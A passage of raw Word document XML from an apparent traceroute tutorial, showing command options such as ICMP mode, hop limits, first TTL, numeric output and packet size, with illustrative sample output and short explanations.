        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Higher success</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Many firewalls allow TCP port 80 while blocking ICMP/UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B6913" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancer insight</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Shows how web traffic actually routes through infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296AE561" w14:textId="286B2786" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Use ICMP packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE8E3D"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I google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED35F06" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF1511C"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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1502D"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DA03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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6958D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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D81322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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406DCF0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5  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACC0C5"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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C355C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47E490" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-I flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Uses ICMP echo requests instead of UDP packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24182F7F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requires root</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ICMP traceroute needs elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2E40B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>router.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local gateway responds to ICMP normally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715349B8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>isp-gateway.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP router handles ICMP echo requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FFBE0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backbone1.isp.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Internet backbone infrastructure router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AE86BB" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>google-peer.isp.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP's connection to Google network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A73A348" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lga25s62-in-f14.1e100.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Google's server responding to ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114BB17D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="179"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Better success rate</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ICMP often works when UDP is blocked by firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4C1F5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Use ICMP echo requests instead of UDP (requires root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F19AAA" w14:textId="5AAF8AA9" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Set maximum hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C72A40"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m 15 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC9F75" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006E2CEA"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google.com (142.251.46.142), 15 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBDC595"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14519DE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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A24664D"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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017567F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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10220B3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5  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05161492"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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1FCD80" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1B84A3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-m 15 flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Limits maximum number of hops to 15 instead of default 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC3297" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15 hops max</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Header shows reduced hop limit in effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED8860" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early termination</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Traceroute stops at 15 hops even if destination unreached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19958339" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Useful for diagnosing problems within your network segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7EBF7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Faster execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reduces time by not probing beyond limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5184166E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>router.local</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: First hop (local gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535D6089" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="180"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Successful completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Reached Google in 6 hops, well under the 15-hop limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D5B29" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Limit trace depth for local network analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AF033E" w14:textId="19694449" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Set first TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C491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f 5 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C38F1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9143A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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC354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5  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5C58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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA8B8B8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C34668" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-f 5 flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Starts tracing from TTL (Time To Live) value of 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F70DC45" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Skipped hops 1-4</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router, ISP gateway, and backbone hops not shown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BF30C3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: google-peer.isp.net - First displayed hop at ISP-Google connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE7FAE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Final destination reached at Google's server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335240F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>28-32ms latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Response times from ISP peering point to destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B511DD" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Avoids displaying known local network infrastructure, focuses on external path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B30E3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Skip first few hops in known local network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F59FD" w14:textId="26FEDA96" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Numeric output only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FC43D5"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n google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C32535" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77527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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4AFBA"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1  192.168.1.1  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6210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2  10.0.0.1  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DD4B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3  203.0.113.1  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5919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4  203.0.113.10  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05C4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5  203.0.113.30  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFFD4C5"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6  142.251.46.142  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00927B63" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E943512" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-n flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Displays IP addresses instead of resolving hostnames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4BE8B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router/gateway (no hostname lookup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CEB905" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP's first router shown as IP only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CC0CC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>203.0.113.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Internet backbone router address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D0CA0" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No DNS lookups</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Faster execution without hostname resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA5103" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three timing values</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Round-trip times for three probe packets per hop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A028F5E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Progressive latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 1ms to 32ms showing increasing distance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42FA97" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pure numeric format</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Useful for scripts and when DNS is slow/unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57944CFE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> Faster execution without DNS lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A99D1" w14:textId="5ECF1D76" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Specify packet size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBD63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s 1472 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E50BF7" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0508C75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google.com (142.251.46.142), 30 hops max, 1472 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD53A4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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
